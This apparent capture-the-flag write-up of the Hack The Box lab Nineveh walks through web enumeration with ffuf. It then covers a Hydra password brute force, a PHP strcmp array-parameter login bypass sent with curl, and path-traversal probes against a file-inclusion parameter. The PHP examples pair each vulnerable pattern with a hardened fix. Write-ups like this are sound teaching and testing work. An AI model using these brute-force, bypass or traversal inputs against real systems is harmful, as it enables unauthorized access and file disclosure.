Web


Nmap discovered a web server on port 80 of the target.

Webroot

It's the default page of an Apache2 installation, so the actual application has to be found by fuzzing.

Fuzzing


┌──(kali㉿kali)-[~/archive/htb/labs/nineveh]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://$IP/FUZZ -ic -e .txt,.php,.html
________________________________________________
 
 :: Method           : GET
 :: URL              : http://10.10.10.43/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
 :: Extensions       : .txt .php .html 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
 
info.php                [Status: 200, Size: 83783, Words: 4060, Lines: 978, Duration: 61ms]
index.html              [Status: 200, Size: 178, Words: 22, Lines: 6, Duration: 4115ms]
department              [Status: 301, Size: 315, Words: 20, Lines: 10, Duration: 31ms]

ffuf found a directory, /department/, and /info.php, which looks like a phpinfo() page. phpinfo() output is worth reading in full: it gives the PHP version, loaded extensions and settings such as allow_url_include and open_basedir, all of which matter later for file-inclusion attacks.

/department/


Upon browsing to /department/, I got redirected to /department/login.php. It's a login page.

The login error message differs between a wrong password and an unknown user, so I may be able to enumerate usernames with it.

The source of /department/login.php contains a comment signed by a user, amrois, suggesting a SQL-related issue with the login page.

amrois isn't a valid username for the web app, though.

Brute-forcing with Hydra


┌──(kali㉿kali)-[~/archive/htb/labs/nineveh]
└─$ hydra -l admin -P /usr/share/wordlists/rockyou.txt 'http-post-form://10.10.10.43:80//department/login.php:username=^USER^&password=^PASS^:F=Invalid Password!'
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
 
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-16 21:47:21
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://10.10.10.43:80//department/login.php:username=^USER^&password=^PASS^:F=Invalid Password!
[STATUS] 1278.00 tries/min, 1278 tries in 00:01h, 14343121 to do in 187:04h, 16 active
[STATUS] 1482.67 tries/min, 4448 tries in 00:03h, 14339951 to do in 161:12h, 16 active
[80][http-post-form] host: 10.10.10.43   login: admin   password: 1q2w3e4r5t
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-01-16 21:50:33

I was able to brute-force the web app authentication with Hydra: admin / 1q2w3e4r5t. The F= failure string is the wrong-password message seen earlier; Hydra treats any response that does not contain it as a hit, so the failure string must be exact or a changed error page produces false positives.

PHP Type Juggling/Confusion


If the login compares the password with strcmp() under a loose comparison (strcmp($pass, $secret) == 0), I can bypass authentication by submitting the parameter as an array (password[]=) instead of a string. On PHP 5 and 7, strcmp() with a non-string argument emits a warning and returns NULL, and NULL == 0 is true, so the check passes without the password. PHP 8 throws a TypeError for the same call, so the trick depends on the PHP version shown in /info.php.
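The bug class in code, as an added example that is not Nineveh's source: a login check that trusts strcmp() == 0 next to a hardened version, both fed the same request bodies that a browser would send. The constant names, the placeholder credential and the request bodies are assumptions for illustration.

```php
<?php
// Added example, not the application's source. ADMIN_USER and ADMIN_PASS are
// placeholders standing in for the hard-coded credential the note hints at.
const ADMIN_USER = 'admin';
const ADMIN_PASS = 'placeholder-secret';

// Vulnerable pattern: strcmp() is defined for strings only. On PHP 5 and 7,
// passing an array raises a warning and returns NULL, and NULL == 0 is true
// under loose comparison, so the check passes without the password.
// PHP 8 throws a TypeError for the same call, so the trick is version-bound.
function vulnerable_login($user, $pass): bool
{
    return $user == ADMIN_USER && @strcmp($pass, ADMIN_PASS) == 0;
}

// Hardened pattern: refuse anything that is not a string before it reaches a
// comparison function, then compare in constant time with hash_equals().
function hardened_login($user, $pass): bool
{
    if (!is_string($user) || !is_string($pass)) {
        return false;
    }
    return hash_equals(ADMIN_USER, $user) && hash_equals(ADMIN_PASS, $pass);
}

// Constructed POST bodies. PHP's own query parser turns "password[]=" into an
// array, which is what a Burp-edited POST to login.php would deliver to $_POST.
$bodies = [
    'username=admin&password=wrong',
    'username=admin&password[]=',
];

foreach ($bodies as $raw) {
    parse_str($raw, $post);
    try {
        $vuln = vulnerable_login($post['username'], $post['password']) ? 'LOGIN' : 'denied';
    } catch (TypeError $e) {
        $vuln = 'TypeError (PHP 8+)';
    }
    $hard = hardened_login($post['username'], $post['password']) ? 'LOGIN' : 'denied';
    printf("%-30s vulnerable=%-18s hardened=%s\n", $raw, $vuln, $hard);
}
```

Against the real target the same request is a single curl with the array-style parameter, curl -d 'username=admin&password[]=' http://$IP/department/login.php; the hardened function shows why is_string() plus hash_equals() closes the hole regardless of PHP version.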

Fuzzing


┌──(kali㉿kali)-[~/archive/htb/labs/nineveh]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://$IP/department/FUZZ -ic -e .txt,.php,.html
________________________________________________
 
 :: Method           : GET
 :: URL              : http://10.10.10.43/department/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
 :: Extensions       : .txt .php .html 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
 
index.php               [Status: 200, Size: 68, Words: 3, Lines: 2, Duration: 145ms]
login.php               [Status: 200, Size: 1560, Words: 406, Lines: 58, Duration: 57ms]
files                   [Status: 301, Size: 321, Words: 20, Lines: 10, Duration: 38ms]
header.php              [Status: 200, Size: 670, Words: 217, Lines: 22, Duration: 34ms]
footer.php              [Status: 200, Size: 51, Words: 19, Lines: 8, Duration: 30ms]
css                     [Status: 301, Size: 319, Words: 20, Lines: 10, Duration: 31ms]
logout.php              [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 32ms]
manage.php              [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 29ms]

Fuzzing the /department/ directory further reveals a files/ directory plus manage.php and logout.php. Both manage.php and logout.php answer with a 302 when unauthenticated, which marks them as the post-login part of the application.

Admin Panel


Either by brute-forcing or by bypassing the check, I got logged in. The page says the website is under construction, and there is a Notes tab in the top-left corner.

It appears to be another note left by amrois. There are important bits here:

  • The login page has not been fixed
  • A hard-coded credential somewhere
  • A secret folder
  • A DB interface

LFI


It's also very interesting that the Notes link is literally just a parameter pointing to files/ninevehNotes.txt. ffuf has already discovered the /department/files/ directory, so it must contain ninevehNotes.txt.

I can quickly confirm that

┌──(kali㉿kali)-[~/archive/htb/labs/nineveh]
└─$ curl http://$IP/department/files/ninevehNotes.txt
<li>Have you fixed the login page yet! hardcoded username and password is really bad idea!</li>
<li>check your serect folder to get in! figure it out! this is your challenge</li>
<li>Improve the db interface.
<small>~amrois</small>

Yes. A file path passed straight through a URL parameter screams LFI to me.
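The pattern the Notes link suggests, as an added example that is not Nineveh's source: an include() fed directly from the query string beside a version that pins the file to one directory and one extension. The parameter handling, the sandbox directory and the probe strings are assumptions; the page only shows that a files/ninevehNotes.txt path is carried in a parameter.

```php
<?php
// Added example, not the application's source. The way the parameter reaches
// include() and the files/ layout are assumptions drawn from the Notes link.

// Vulnerable pattern: the query-string value is the path. Anything the web
// server user can read is reachable, e.g. ../../../../etc/passwd, and with a
// writable log or upload location it becomes code execution.
function vulnerable_notes(string $param): void
{
    include $param;
}

// Hardened pattern: reduce the value to a bare file name, resolve it inside
// the intended directory, and only serve the expected extension. The realpath()
// prefix check catches symlinks and any join order that basename() alone
// would not protect.
function hardened_notes(string $param, string $base): ?string
{
    $root = realpath($base);
    $candidate = realpath($base . DIRECTORY_SEPARATOR . basename($param));
    if ($root === false || $candidate === false) {
        return null; // does not exist inside files/
    }
    if (strncmp($candidate, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return null; // resolved outside files/
    }
    if (pathinfo($candidate, PATHINFO_EXTENSION) !== 'txt') {
        return null; // only plain-text notes are served
    }
    return file_get_contents($candidate);
}

// Constructed sandbox standing in for /department/files/.
$base = sys_get_temp_dir() . '/nineveh_demo_files';
if (!is_dir($base)) {
    mkdir($base, 0700, true);
}
file_put_contents($base . '/ninevehNotes.txt', "<li>demo note</li>\n");
file_put_contents($base . '/config.php', "<?php \$db = 'secret';\n");

// Constructed probes: the kind of values sent while testing the parameter.
$probes = [
    'ninevehNotes.txt',                 // legitimate
    '../../../../etc/passwd',           // classic traversal
    'files/../files/ninevehNotes.txt',  // traversal that still names a note
    'config.php',                       // right directory, wrong type
];
foreach ($probes as $p) {
    $r = hardened_notes($p, $base);
    printf("%-36s %s\n", $p, $r === null ? 'blocked' : 'served (' . strlen($r) . ' bytes)');
}
```

The hardened function is the check to keep in mind while testing: if the real parameter accepts a path that does not reduce to a name inside files/ with a .txt extension, the application is behaving like vulnerable_notes() and the parameter is worth probing with traversal strings and PHP wrappers.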